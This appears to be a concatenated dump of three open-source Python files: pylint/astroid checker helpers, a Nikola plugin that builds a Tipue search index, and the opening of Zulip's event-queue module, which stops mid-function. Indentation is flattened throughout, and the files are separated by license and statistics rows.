SETITEM_METHOD = '__setitem__'
DELITEM_METHOD = '__delitem__'
CONTAINS_METHOD = '__contains__'
KEYS_METHOD = 'keys'
# Dictionary which maps the number of expected parameters a
# special method can have to a set of special methods.
# The following keys are used to denote the parameters restrictions:
#
# * None: variable number of parameters
# * number: exactly that number of parameters
# * tuple: this are the odd ones. Basically it means that the function
# can work with any number of arguments from that tuple,
# although it's best to implement it in order to accept
# all of them.
_SPECIAL_METHODS_PARAMS = {
None: ('__new__', '__init__', '__call__'),
0: ('__del__', '__repr__', '__str__', '__bytes__', '__hash__', '__bool__',
'__dir__', '__len__', '__length_hint__', '__iter__', '__reversed__',
'__neg__', '__pos__', '__abs__', '__invert__', '__complex__', '__int__',
'__float__', '__neg__', '__pos__', '__abs__', '__complex__', '__int__',
'__float__', '__index__', '__enter__', '__aenter__', '__getnewargs_ex__',
'__getnewargs__', '__getstate__', '__reduce__', '__copy__',
'__unicode__', '__nonzero__', '__await__', '__aiter__', '__anext__',
'__fspath__'),
1: ('__format__', '__lt__', '__le__', '__eq__', '__ne__', '__gt__',
'__ge__', '__getattr__', '__getattribute__', '__delattr__',
'__delete__', '__instancecheck__', '__subclasscheck__',
'__getitem__', '__missing__', '__delitem__', '__contains__',
'__add__', '__sub__', '__mul__', '__truediv__', '__floordiv__',
'__mod__', '__divmod__', '__lshift__', '__rshift__', '__and__',
'__xor__', '__or__', '__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rmod__', '__rdivmod__', '__rpow__', '__rlshift__', '__rrshift__',
'__rand__', '__rxor__', '__ror__', '__iadd__', '__isub__', '__imul__',
'__itruediv__', '__ifloordiv__', '__imod__', '__ilshift__',
'__irshift__', '__iand__', '__ixor__', '__ior__', '__ipow__',
'__setstate__', '__reduce_ex__', '__deepcopy__', '__cmp__',
'__matmul__', '__rmatmul__', '__div__'),
2: ('__setattr__', '__get__', '__set__', '__setitem__'),
3: ('__exit__', '__aexit__'),
(0, 1): ('__round__', ),
}
SPECIAL_METHODS_PARAMS = {
name: params
for params, methods in _SPECIAL_METHODS_PARAMS.items()
for name in methods
}
PYMETHODS = set(SPECIAL_METHODS_PARAMS)
class NoSuchArgumentError(Exception):
pass
def is_inside_except(node):
"""Returns true if node is inside the name of an except handler."""
current = node
while current and not isinstance(current.parent, astroid.ExceptHandler):
current = current.parent
return current and current is current.parent.name
def get_all_elements(node):
"""Recursively returns all atoms in nested lists and tuples."""
if isinstance(node, (astroid.Tuple, astroid.List)):
for child in node.elts:
for e in get_all_elements(child):
yield e
else:
yield node
def clobber_in_except(node):
"""Checks if an assignment node in an except handler clobbers an existing
variable.
Returns (True, args for W0623) if assignment clobbers an existing variable,
(False, None) otherwise.
"""
if isinstance(node, astroid.AssignAttr):
return (True, (node.attrname, 'object %r' % (node.expr.as_string(),)))
elif isinstance(node, astroid.AssignName):
name = node.name
if is_builtin(name):
return (True, (name, 'builtins'))
else:
stmts = node.lookup(name)[1]
if (stmts and not isinstance(stmts[0].assign_type(),
(astroid.Assign, astroid.AugAssign,
astroid.ExceptHandler))):
return (True, (name, 'outer scope (line %s)' % stmts[0].fromlineno))
return (False, None)
def is_super(node):
"""return True if the node is referencing the "super" builtin function
"""
if getattr(node, 'name', None) == 'super' and \
node.root().name == BUILTINS_NAME:
return True
return False
def is_error(node):
"""return true if the function does nothing but raising an exception"""
for child_node in node.get_children():
if isinstance(child_node, astroid.Raise):
return True
return False
def is_raising(body):
"""return true if the given statement node raise an exception"""
for node in body:
if isinstance(node, astroid.Raise):
return True
return False
builtins = builtins.__dict__.copy()
SPECIAL_BUILTINS = ('__builtins__',) # '__path__', '__file__')
def is_builtin_object(node):
"""Returns True if the given node is an object from the __builtin__ module."""
return node and node.root().name == BUILTINS_NAME
def is_builtin(name):
"""return true if <name> could be considered as a builtin defined by python
"""
return name in builtins or name in SPECIAL_BUILTINS
def is_defined_before(var_node):
"""return True if the variable node is defined by a parent node (list,
set, dict, or generator comprehension, lambda) or in a previous sibling
node on the same line (statement_defining ; statement_using)
"""
varname = var_node.name
_node = var_node.parent
while _node:
if isinstance(_node, COMP_NODE_TYPES):
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.For):
for ass_node in _node.target.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
elif isinstance(_node, astroid.With):
for expr, ids in _node.items:
if expr.parent_of(var_node):
break
if (ids and
isinstance(ids, astroid.AssignName) and
ids.name == varname):
return True
elif isinstance(_node, (astroid.Lambda, astroid.FunctionDef)):
if _node.args.is_argument(varname):
# If the name is found inside a default value
# of a function, then let the search continue
# in the parent's tree.
if _node.args.parent_of(var_node):
try:
_node.args.default_value(varname)
_node = _node.parent
continue
except astroid.NoDefault:
pass
return True
if getattr(_node, 'name', None) == varname:
return True
break
elif isinstance(_node, astroid.ExceptHandler):
if isinstance(_node.name, astroid.AssignName):
ass_node = _node.name
if ass_node.name == varname:
return True
_node = _node.parent
# possibly multiple statements on the same line using semi colon separator
stmt = var_node.statement()
_node = stmt.previous_sibling()
lineno = stmt.fromlineno
while _node and _node.fromlineno == lineno:
for ass_node in _node.nodes_of_class(astroid.AssignName):
if ass_node.name == varname:
return True
for imp_node in _node.nodes_of_class((astroid.ImportFrom, astroid.Import)):
if varname in [name[1] or name[0] for name in imp_node.names]:
return True
_node = _node.previous_sibling()
return False
def is_func_default(node):
"""return true if the given Name node is used in function default argument's
value
"""
parent = node.scope()
if isinstance(parent, astroid.FunctionDef):
for default_node in parent.args.defaults:
for default_name_node in default_node.nodes_of_class(astroid.Name):
if default_name_node is node:
return True
return False
def is_func_decorator(node):
"""return true if the name is used in function decorator"""
parent = node.parent
while parent is not None:
if isinstance(parent, astroid.Decorators):
return True
if (parent.is_statement or
isinstance(parent, (astroid.Lambda,
scoped_nodes.ComprehensionScope,
scoped_nodes.ListComp))):
break
parent = parent.parent
return False
def is_ancestor_name(frame, node):
"""return True if `frame` is a astroid.Class node with `node` in the
subtree of its bases attribute
"""
try:
bases = frame.bases
except AttributeError:
return False
for base in bases:
if node in base.nodes_of_class(astroid.Name):
return True
return False
def assign_parent(node):
"""return the higher parent which is not an AssName, Tuple or List node
"""
while node and isinstance(node, (astroid.AssignName,
astroid.Tuple,
astroid.List)):
node = node.parent
return node
def overrides_a_method(class_node, name):
"""return True if <name> is a method overridden from an ancestor"""
for ancestor in class_node.ancestors():
if name in ancestor and isinstance(ancestor[name], astroid.FunctionDef):
return True
return False
def check_messages(*messages):
"""decorator to store messages that are handled by a checker method"""
def store_messages(func):
func.checks_msgs = messages
return func
return store_messages
class IncompleteFormatString(Exception):
"""A format string ended in the middle of a format specifier."""
pass
class UnsupportedFormatCharacter(Exception):
"""A format character in a format string is not one of the supported
format characters."""
def __init__(self, index):
Exception.__init__(self, index)
self.index = index
def parse_format_string(format_string):
"""Parses a format string, returning a tuple of (keys, num_args), where keys
is the set of mapping keys in the format string, and num_args is the number
of arguments required by the format string. Raises
IncompleteFormatString or UnsupportedFormatCharacter if a
parse error occurs."""
keys = set()
num_args = 0
def next_char(i):
i += 1
if i == len(format_string):
raise IncompleteFormatString
return (i, format_string[i])
i = 0
while i < len(format_string):
char = format_string[i]
if char == '%':
i, char = next_char(i)
# Parse the mapping key (optional).
key = None
if char == '(':
depth = 1
i, char = next_char(i)
key_start = i
while depth != 0:
if char == '(':
depth += 1
elif char == ')':
depth -= 1
i, char = next_char(i)
key_end = i - 1
key = format_string[key_start:key_end]
# Parse the conversion flags (optional).
while char in '#0- +':
i, char = next_char(i)
# Parse the minimum field width (optional).
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the precision (optional).
if char == '.':
i, char = next_char(i)
if char == '*':
num_args += 1
i, char = next_char(i)
else:
while char in string.digits:
i, char = next_char(i)
# Parse the length modifier (optional).
if char in 'hlL':
i, char = next_char(i)
# Parse the conversion type (mandatory).
if PY3K:
flags = 'diouxXeEfFgGcrs%a'
else:
flags = 'diouxXeEfFgGcrs%'
if char not in flags:
raise UnsupportedFormatCharacter(i)
if key:
keys.add(key)
elif char != '%':
num_args += 1
i += 1
return keys, num_args
def is_attr_protected(attrname):
"""return True if attribute name is protected (start with _ and some other
details), False otherwise.
"""
return attrname[0] == '_' and attrname != '_' and not (
attrname.startswith('__') and attrname.endswith('__'))
def node_frame_class(node):
"""return klass node for a method node (or a staticmethod or a
classmethod), return null otherwise
"""
klass = node.frame()
while klass is not None and not isinstance(klass, astroid.ClassDef):
if klass.parent is None:
klass = None
else:
klass = klass.parent.frame()
return klass
def is_attr_private(attrname):
"""Check that attribute name is private (at least two leading underscores,
at most one trailing underscore)
"""
regex = re.compile('^_{2,}.*[^_]+_?$')
return regex.match(attrname)
def get_argument_from_call(callfunc_node, position=None, keyword=None):
"""Returns the specified argument from a function call.
:param astroid.Call callfunc_node: Node representing a function call to check.
:param int position: position of the argument.
:param str keyword: the keyword of the argument.
:returns: The node representing the argument, None if the argument is not found.
:rtype: astroid.Name
:raises ValueError: if both position and keyword are None.
:raises NoSuchArgumentError: if no argument at the provided position or with
the provided keyword.
"""
if position is None and keyword is None:
raise ValueError('Must specify at least one of: position or keyword.')
if position is not None:
try:
return callfunc_node.args[position]
except IndexError:
pass
if keyword and callfunc_node.keywords:
for arg in callfunc_node.keywords:
if arg.arg == keyword:
return arg.value
raise NoSuchArgumentError
def inherit_from_std_ex(node):
"""
Return true if the given class node is subclass of
exceptions.Exception.
"""
if node.name in ('Exception', 'BaseException') \
and node.root().name == EXCEPTIONS_MODULE:
return True
return any(inherit_from_std_ex(parent)
for parent in node.ancestors(recurs=True))
def error_of_type(handler, error_type):
"""
Check if the given exception handler catches
the given error_type.
The *handler* parameter is a node, representing an ExceptHandler node.
The *error_type* can be an exception, such as AttributeError,
the name of an exception, or it can be a tuple of errors.
The function will return True if the handler catches any of the
given errors.
"""
def stringify_error(error):
if not isinstance(error, six.string_types):
return error.__name__
return error
if not isinstance(error_type, tuple):
error_type = (error_type, )
expected_errors = {stringify_error(error) for error in error_type}
if not handler.type:
# bare except. While this indeed catches anything, if the desired errors
# aren't specified directly, then we just ignore it.
return False
return handler.catch(expected_errors)
def decorated_with_property(node):
""" Detect if the given function node is decorated with a property. """
if not node.decorators:
return False
for decorator in node.decorators.nodes:
if not isinstance(decorator, astroid.Name):
continue
try:
if _is_property_decorator(decorator):
return True
except astroid.InferenceError:
pass
return False
def _is_property_decorator(decorator):
for infered in decorator.infer():
if isinstance(infered, astroid.ClassDef):
if infered.root().name == BUILTINS_NAME and infered.name == 'property':
return True
for ancestor in infered.ancestors():
if ancestor.name == 'property' and ancestor.root().name == BUILTINS_NAME:
return True
def decorated_with(func, qnames):
"""Determine if the `func` node has a decorator with the qualified name `qname`."""
decorators = func.decorators.nodes if func.decorators else []
for decorator_node in decorators:
try:
if any(i is not None and i.qname() in qnames for i in decorator_node.infer()):
return True
except astroid.InferenceError:
continue
return False
@lru_cache(maxsize=1024)
def unimplemented_abstract_methods(node, is_abstract_cb=None):
"""
Get the unimplemented abstract methods for the given *node*.
A method can be considered abstract if the callback *is_abstract_cb*
returns a ``True`` value. The check defaults to verifying that
a method is decorated with abstract methods.
The function will work only for new-style classes. For old-style
classes, it will simply return an empty dictionary.
For the rest of them, it will return a dictionary of abstract method
names and their inferred objects.
"""
if is_abstract_cb is None:
is_abstract_cb = functools.partial(
decorated_with, qnames=ABC_METHODS)
visited = {}
try:
mro = reversed(node.mro())
except NotImplementedError:
# Old style class, it will not have a mro.
return {}
except astroid.ResolveError:
# Probably inconsistent hierarchy, don'try
# to figure this out here.
return {}
for ancestor in mro:
for obj in ancestor.values():
infered = obj
if isinstance(obj, astroid.AssignName):
infered = safe_infer(obj)
if not infered:
# Might be an abstract function,
# but since we don't have enough information
# in order to take this decision, we're taking
# the *safe* decision instead.
if obj.name in visited:
del visited[obj.name]
continue
if not isinstance(infered, astroid.FunctionDef):
if obj.name in visited:
del visited[obj.name]
if isinstance(infered, astroid.FunctionDef):
# It's critical to use the original name,
# since after inferring, an object can be something
# else than expected, as in the case of the
# following assignment.
#
# class A:
# def keys(self): pass
# __iter__ = keys
abstract = is_abstract_cb(infered)
if abstract:
visited[obj.name] = infered
elif not abstract and obj.name in visited:
del visited[obj.name]
return visited
def _import_node_context(node):
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, ignores):
return current.parent
return None
def is_from_fallback_block(node):
"""Check if the given node is from a fallback import block."""
context = _import_node_context(node)
if not context:
return False
if isinstance(context, astroid.ExceptHandler):
other_body = context.parent.body
handlers = context.parent.handlers
else:
other_body = itertools.chain.from_iterable(
handler.body for handler in context.handlers)
handlers = context.handlers
has_fallback_imports = any(isinstance(import_node, (astroid.ImportFrom, astroid.Import))
for import_node in other_body)
ignores_import_error = _except_handlers_ignores_exception(handlers, ImportError)
return ignores_import_error or has_fallback_imports
def _except_handlers_ignores_exception(handlers, exception):
func = functools.partial(error_of_type,
error_type=(exception, ))
return any(map(func, handlers))
def node_ignores_exception(node, exception):
"""Check if the node is in a TryExcept which handles the given exception."""
current = node
ignores = (astroid.ExceptHandler, astroid.TryExcept)
while current and not isinstance(current.parent, ignores):
current = current.parent
if current and isinstance(current.parent, astroid.TryExcept):
return _except_handlers_ignores_exception(current.parent.handlers, exception)
return False
def class_is_abstract(node):
"""return true if the given class node should be considered as an abstract
class
"""
for method in node.methods():
if method.parent.frame() is node:
if method.is_abstract(pass_is_abstract=False):
return True
return False
def _supports_protocol_method(value, attr):
try:
attributes = value.getattr(attr)
except astroid.NotFoundError:
return False
first = attributes[0]
if isinstance(first, astroid.AssignName):
if isinstance(first.parent.value, astroid.Const):
return False
return True
def is_comprehension(node):
comprehensions = (astroid.ListComp,
astroid.SetComp,
astroid.DictComp,
astroid.GeneratorExp)
return isinstance(node, comprehensions)
def _supports_mapping_protocol(value):
return (
_supports_protocol_method(value, GETITEM_METHOD)
and _supports_protocol_method(value, KEYS_METHOD)
)
def _supports_membership_test_protocol(value):
return _supports_protocol_method(value, CONTAINS_METHOD)
def _supports_iteration_protocol(value):
return (
_supports_protocol_method(value, ITER_METHOD)
or _supports_protocol_method(value, GETITEM_METHOD)
)
def _supports_getitem_protocol(value):
return _supports_protocol_method(value, GETITEM_METHOD)
def _supports_setitem_protocol(value):
return _supports_protocol_method(value, SETITEM_METHOD)
def _supports_delitem_protocol(value):
return _supports_protocol_method(value, DELITEM_METHOD)
def _is_abstract_class_name(name):
lname = name.lower()
is_mixin = lname.endswith('mixin')
is_abstract = lname.startswith('abstract')
is_base = lname.startswith('base') or lname.endswith('base')
return is_mixin or is_abstract or is_base
def is_inside_abstract_class(node):
while node is not None:
if isinstance(node, astroid.ClassDef):
if class_is_abstract(node):
return True
name = getattr(node, 'name', None)
if name is not None and _is_abstract_class_name(name):
return True
node = node.parent
return False
def _supports_protocol(value, protocol_callback):
if isinstance(value, astroid.ClassDef):
if not has_known_bases(value):
return True
# classobj can only be iterable if it has an iterable metaclass
meta = value.metaclass()
if meta is not None:
if protocol_callback(meta):
return True
if isinstance(value, astroid.BaseInstance):
if not has_known_bases(value):
return True
if protocol_callback(value):
return True
# TODO: this is not needed in astroid 2.0, where we can
# check the type using a virtual base class instead.
if (isinstance(value, _bases.Proxy)
and isinstance(value._proxied, astroid.BaseInstance)
and has_known_bases(value._proxied)):
value = value._proxied
return protocol_callback(value)
return False
def is_iterable(value):
return _supports_protocol(value, _supports_iteration_protocol)
def is_mapping(value):
return _supports_protocol(value, _supports_mapping_protocol)
def supports_membership_test(value):
supported = _supports_protocol(value, _supports_membership_test_protocol)
return supported or is_iterable(value)
def supports_getitem(value):
return _supports_protocol(value, _supports_getitem_protocol)
def supports_setitem(value):
return _supports_protocol(value, _supports_setitem_protocol)
def supports_delitem(value):
return _supports_protocol(value, _supports_delitem_protocol)
# TODO(cpopa): deprecate these or leave them as aliases?
@lru_cache(maxsize=1024)
def safe_infer(node, context=None):
"""Return the inferred value for the given node.
Return None if inference failed or if there is some ambiguity (more than
one node has been inferred).
"""
try:
inferit = node.infer(context=context)
value = next(inferit)
except astroid.InferenceError:
return
try:
next(inferit)
return # None if there is ambiguity on the inferred node
except astroid.InferenceError:
return # there is some kind of ambiguity
except StopIteration:
return value
def has_known_bases(klass, context=None):
"""Return true if all base classes of a class could be inferred."""
try:
return klass._all_bases_known
except AttributeError:
pass
for base in klass.bases:
result = safe_infer(base, context=context)
# TODO: check for A->B->A->B pattern in class structure too?
if (not isinstance(result, astroid.ClassDef) or
result is klass or
not has_known_bases(result, context=context)):
klass._all_bases_known = False
return False
klass._all_bases_known = True
return True
def is_none(node):
return (node is None or
(isinstance(node, astroid.Const) and node.value is None) or
(isinstance(node, astroid.Name) and node.name == 'None')
)
def node_type(node):
"""Return the inferred type for `node`
If there is more than one possible type, or if inferred type is YES or None,
return None
"""
# check there is only one possible type for the assign node. Else we
# don't handle it for now
types = set()
try:
for var_type in node.infer():
if var_type == astroid.YES or is_none(var_type):
continue
types.add(var_type)
if len(types) > 1:
return
except astroid.InferenceError:
return
return types.pop() if types else None
def is_registered_in_singledispatch_function(node):
"""Check if the given function node is a singledispatch function."""
singledispatch_qnames = (
'functools.singledispatch',
'singledispatch.singledispatch'
)
if not isinstance(node, astroid.FunctionDef):
return False
decorators = node.decorators.nodes if node.decorators else []
for decorator in decorators:
# func.register are function calls
if not isinstance(decorator, astroid.Call):
continue
func = decorator.func
if not isinstance(func, astroid.Attribute) or func.attrname != 'register':
continue
try:
func_def = next(func.expr.infer())
except astroid.InferenceError:
continue
if isinstance(func_def, astroid.FunctionDef):
return decorated_with(func_def, singledispatch_qnames)
return False
| mit | 5,545,447,352,638,537,000 | 33.596512 | 92 | 0.601049 | false |
getnikola/plugins | v7/localsearch/localsearch/__init__.py | 1 | 4350 | # -*- coding: utf-8 -*-
# Copyright © 2012-2014 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from __future__ import unicode_literals
import codecs
import json
import os
from nikola.plugin_categories import LateTask
from nikola.utils import apply_filters, config_changed, copy_tree, makedirs
# This is what we need to produce:
# var tipuesearch = {"pages": [
# {"title": "Tipue Search, a jQuery site search engine", "text": "Tipue
# Search is a site search engine jQuery plugin. It's free for both commercial and
# non-commercial use and released under the MIT License. Tipue Search includes
# features such as word stemming and word replacement.", "tags": "JavaScript",
# "loc": "http://www.tipue.com/search"},
# {"title": "Tipue Search demo", "text": "Tipue Search demo. Tipue Search is
# a site search engine jQuery plugin.", "tags": "JavaScript", "loc":
# "http://www.tipue.com/search/demo"},
# {"title": "About Tipue", "text": "Tipue is a small web development/design
# studio based in North London. We've been around for over a decade.", "tags": "",
# "loc": "http://www.tipue.com/about"}
# ]};
class Tipue(LateTask):
"""Render the blog posts as JSON data."""
name = "localsearch"
def gen_tasks(self):
self.site.scan_posts()
kw = {
"translations": self.site.config['TRANSLATIONS'],
"output_folder": self.site.config['OUTPUT_FOLDER'],
"filters": self.site.config['FILTERS'],
"timeline": self.site.timeline,
}
posts = self.site.timeline[:]
dst_path = os.path.join(kw["output_folder"], "assets", "js",
"tipuesearch_content.js")
def save_data():
pages = []
for lang in kw["translations"]:
for post in posts:
# Don't index drafts (Issue #387)
if post.is_draft or post.is_private or post.publish_later:
continue
text = post.text(lang, strip_html=True)
text = text.replace('^', '')
data = {}
data["title"] = post.title(lang)
data["text"] = text
data["tags"] = ",".join(post.tags)
data["url"] = post.permalink(lang, absolute=True)
pages.append(data)
output = json.dumps({"pages": pages}, indent=2)
output = 'var tipuesearch = ' + output + ';'
makedirs(os.path.dirname(dst_path))
with codecs.open(dst_path, "wb+", "utf8") as fd:
fd.write(output)
task = {
"basename": str(self.name),
"name": dst_path,
"targets": [dst_path],
"actions": [(save_data, [])],
'uptodate': [config_changed(kw)],
'calc_dep': ['_scan_locs:sitemap']
}
yield apply_filters(task, kw['filters'])
# Copy all the assets to the right places
asset_folder = os.path.join(os.path.dirname(__file__), "files")
for task in copy_tree(asset_folder, kw["output_folder"]):
task["basename"] = str(self.name)
yield apply_filters(task, kw['filters'])
| mit | -2,557,237,027,577,164,000 | 40.028302 | 90 | 0.601977 | false |
udxxabp/zulip | zerver/lib/event_queue.py | 115 | 29293 | from __future__ import absolute_import
from django.conf import settings
from django.utils.timezone import now
from collections import deque
import datetime
import os
import time
import socket
import logging
import ujson
import requests
import cPickle as pickle
import atexit
import sys
import signal
import tornado
import random
import traceback
from zerver.lib.cache import cache_get_many, message_cache_key, \
user_profile_by_id_cache_key, cache_save_user_profile
from zerver.lib.cache_helpers import cache_with_key
from zerver.lib.utils import statsd
from zerver.middleware import async_request_restart
from zerver.models import get_client, Message
from zerver.lib.narrow import build_narrow_filter
from zerver.lib.queue import queue_json_publish
from zerver.lib.timestamp import timestamp_to_datetime
import copy
# The idle timeout used to be a week, but we found that in that
# situation, queues from dead browser sessions would grow quite large
# due to the accumulation of message data in those queues.
IDLE_EVENT_QUEUE_TIMEOUT_SECS = 60 * 10
EVENT_QUEUE_GC_FREQ_MSECS = 1000 * 60 * 5
# Capped limit for how long a client can request an event queue
# to live
MAX_QUEUE_TIMEOUT_SECS = 7 * 24 * 60 * 60
# The heartbeats effectively act as a server-side timeout for
# get_events(). The actual timeout value is randomized for each
# client connection based on the below value. We ensure that the
# maximum timeout value is 55 seconds, to deal with crappy home
# wireless routers that kill "inactive" http connections.
HEARTBEAT_MIN_FREQ_SECS = 45
class ClientDescriptor(object):
def __init__(self, user_profile_id, realm_id, event_queue, event_types, client_type,
apply_markdown=True, all_public_streams=False, lifespan_secs=0,
narrow=[]):
# These objects are serialized on shutdown and restored on restart.
# If fields are added or semantics are changed, temporary code must be
# added to load_event_queues() to update the restored objects.
# Additionally, the to_dict and from_dict methods must be updated
self.user_profile_id = user_profile_id
self.realm_id = realm_id
self.current_handler = None
self.event_queue = event_queue
self.queue_timeout = lifespan_secs
self.event_types = event_types
self.last_connection_time = time.time()
self.apply_markdown = apply_markdown
self.all_public_streams = all_public_streams
self.client_type = client_type
self._timeout_handle = None
self.narrow = narrow
self.narrow_filter = build_narrow_filter(narrow)
# Clamp queue_timeout to between minimum and maximum timeouts
self.queue_timeout = max(IDLE_EVENT_QUEUE_TIMEOUT_SECS, min(self.queue_timeout, MAX_QUEUE_TIMEOUT_SECS))
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(user_profile_id=self.user_profile_id,
realm_id=self.realm_id,
event_queue=self.event_queue.to_dict(),
queue_timeout=self.queue_timeout,
event_types=self.event_types,
last_connection_time=self.last_connection_time,
apply_markdown=self.apply_markdown,
all_public_streams=self.all_public_streams,
narrow=self.narrow,
client_type=self.client_type.name)
@classmethod
def from_dict(cls, d):
ret = cls(d['user_profile_id'], d['realm_id'],
EventQueue.from_dict(d['event_queue']), d['event_types'],
get_client(d['client_type']), d['apply_markdown'], d['all_public_streams'],
d['queue_timeout'], d.get('narrow', []))
ret.last_connection_time = d['last_connection_time']
return ret
def prepare_for_pickling(self):
self.current_handler = None
self._timeout_handle = None
def add_event(self, event):
if self.current_handler is not None:
async_request_restart(self.current_handler._request)
self.event_queue.push(event)
self.finish_current_handler()
def finish_current_handler(self):
if self.current_handler is not None:
err_msg = "Got error finishing handler for queue %s" % (self.event_queue.id,)
try:
# We call async_request_restart here in case we are
# being finished without any events (because another
# get_events request has supplanted this request)
async_request_restart(self.current_handler._request)
self.current_handler._request._log_data['extra'] = "[%s/1]" % (self.event_queue.id,)
self.current_handler.zulip_finish(dict(result='success', msg='',
events=self.event_queue.contents(),
queue_id=self.event_queue.id),
self.current_handler._request,
apply_markdown=self.apply_markdown)
except IOError as e:
if e.message != 'Stream is closed':
logging.exception(err_msg)
except AssertionError as e:
if e.message != 'Request closed':
logging.exception(err_msg)
except Exception:
logging.exception(err_msg)
finally:
self.disconnect_handler()
return True
return False
def accepts_event(self, event):
if self.event_types is not None and event["type"] not in self.event_types:
return False
if event["type"] == "message":
return self.narrow_filter(event)
return True
# TODO: Refactor so we don't need this function
def accepts_messages(self):
return self.event_types is None or "message" in self.event_types
def idle(self, now):
if not hasattr(self, 'queue_timeout'):
self.queue_timeout = IDLE_EVENT_QUEUE_TIMEOUT_SECS
return (self.current_handler is None
and now - self.last_connection_time >= self.queue_timeout)
def connect_handler(self, handler):
self.current_handler = handler
handler.client_descriptor = self
self.last_connection_time = time.time()
def timeout_callback():
self._timeout_handle = None
# All clients get heartbeat events
self.add_event(dict(type='heartbeat'))
ioloop = tornado.ioloop.IOLoop.instance()
heartbeat_time = time.time() + HEARTBEAT_MIN_FREQ_SECS + random.randint(0, 10)
if self.client_type.name != 'API: heartbeat test':
self._timeout_handle = ioloop.add_timeout(heartbeat_time, timeout_callback)
def disconnect_handler(self, client_closed=False):
if self.current_handler:
self.current_handler.client_descriptor = None
if client_closed:
request = self.current_handler._request
logging.info("Client disconnected for queue %s (%s via %s)" % \
(self.event_queue.id, request._email, request.client.name))
self.current_handler = None
if self._timeout_handle is not None:
ioloop = tornado.ioloop.IOLoop.instance()
ioloop.remove_timeout(self._timeout_handle)
self._timeout_handle = None
def cleanup(self):
do_gc_event_queues([self.event_queue.id], [self.user_profile_id],
[self.realm_id])
def compute_full_event_type(event):
if event["type"] == "update_message_flags":
if event["all"]:
# Put the "all" case in its own category
return "all_flags/%s/%s" % (event["flag"], event["operation"])
return "flags/%s/%s" % (event["operation"], event["flag"])
return event["type"]
class EventQueue(object):
def __init__(self, id):
self.queue = deque()
self.next_event_id = 0
self.id = id
self.virtual_events = {}
def to_dict(self):
# If you add a new key to this dict, make sure you add appropriate
# migration code in from_dict or load_event_queues to account for
# loading event queues that lack that key.
return dict(id=self.id,
next_event_id=self.next_event_id,
queue=list(self.queue),
virtual_events=self.virtual_events)
@classmethod
def from_dict(cls, d):
ret = cls(d['id'])
ret.next_event_id = d['next_event_id']
ret.queue = deque(d['queue'])
ret.virtual_events = d.get("virtual_events", {})
return ret
def push(self, event):
event['id'] = self.next_event_id
self.next_event_id += 1
full_event_type = compute_full_event_type(event)
if (full_event_type in ["pointer", "restart"] or
full_event_type.startswith("flags/")):
if full_event_type not in self.virtual_events:
self.virtual_events[full_event_type] = copy.deepcopy(event)
return
# Update the virtual event with the values from the event
virtual_event = self.virtual_events[full_event_type]
virtual_event["id"] = event["id"]
if "timestamp" in event:
virtual_event["timestamp"] = event["timestamp"]
if full_event_type == "pointer":
virtual_event["pointer"] = event["pointer"]
elif full_event_type == "restart":
virtual_event["server_generation"] = event["server_generation"]
elif full_event_type.startswith("flags/"):
virtual_event["messages"] += event["messages"]
else:
self.queue.append(event)
# Note that pop ignores virtual events. This is fine in our
# current usage since virtual events should always be resolved to
# a real event before being given to users.
def pop(self):
return self.queue.popleft()
def empty(self):
return len(self.queue) == 0 and len(self.virtual_events) == 0
# See the comment on pop; that applies here as well
def prune(self, through_id):
while len(self.queue) != 0 and self.queue[0]['id'] <= through_id:
self.pop()
def contents(self):
contents = []
virtual_id_map = {}
for event_type in self.virtual_events:
virtual_id_map[self.virtual_events[event_type]["id"]] = self.virtual_events[event_type]
virtual_ids = sorted(list(virtual_id_map.keys()))
# Merge the virtual events into their final place in the queue
index = 0
length = len(virtual_ids)
for event in self.queue:
while index < length and virtual_ids[index] < event["id"]:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
contents.append(event)
while index < length:
contents.append(virtual_id_map[virtual_ids[index]])
index += 1
self.virtual_events = {}
self.queue = deque(contents)
return contents
# maps queue ids to client descriptors
clients = {}
# maps user id to list of client descriptors
user_clients = {}
# maps realm id to list of client descriptors with all_public_streams=True
realm_clients_all_streams = {}
# list of registered gc hooks.
# each one will be called with a user profile id, queue, and bool
# last_for_client that is true if this is the last queue pertaining
# to this user_profile_id
# that is about to be deleted
gc_hooks = []
next_queue_id = 0
def add_client_gc_hook(hook):
gc_hooks.append(hook)
def get_client_descriptor(queue_id):
return clients.get(queue_id)
def get_client_descriptors_for_user(user_profile_id):
return user_clients.get(user_profile_id, [])
def get_client_descriptors_for_realm_all_streams(realm_id):
return realm_clients_all_streams.get(realm_id, [])
def add_to_client_dicts(client):
user_clients.setdefault(client.user_profile_id, []).append(client)
if client.all_public_streams or client.narrow != []:
realm_clients_all_streams.setdefault(client.realm_id, []).append(client)
def allocate_client_descriptor(user_profile_id, realm_id, event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs,
narrow=[]):
global next_queue_id
id = str(settings.SERVER_GENERATION) + ':' + str(next_queue_id)
next_queue_id += 1
client = ClientDescriptor(user_profile_id, realm_id, EventQueue(id), event_types, client_type,
apply_markdown, all_public_streams, lifespan_secs, narrow)
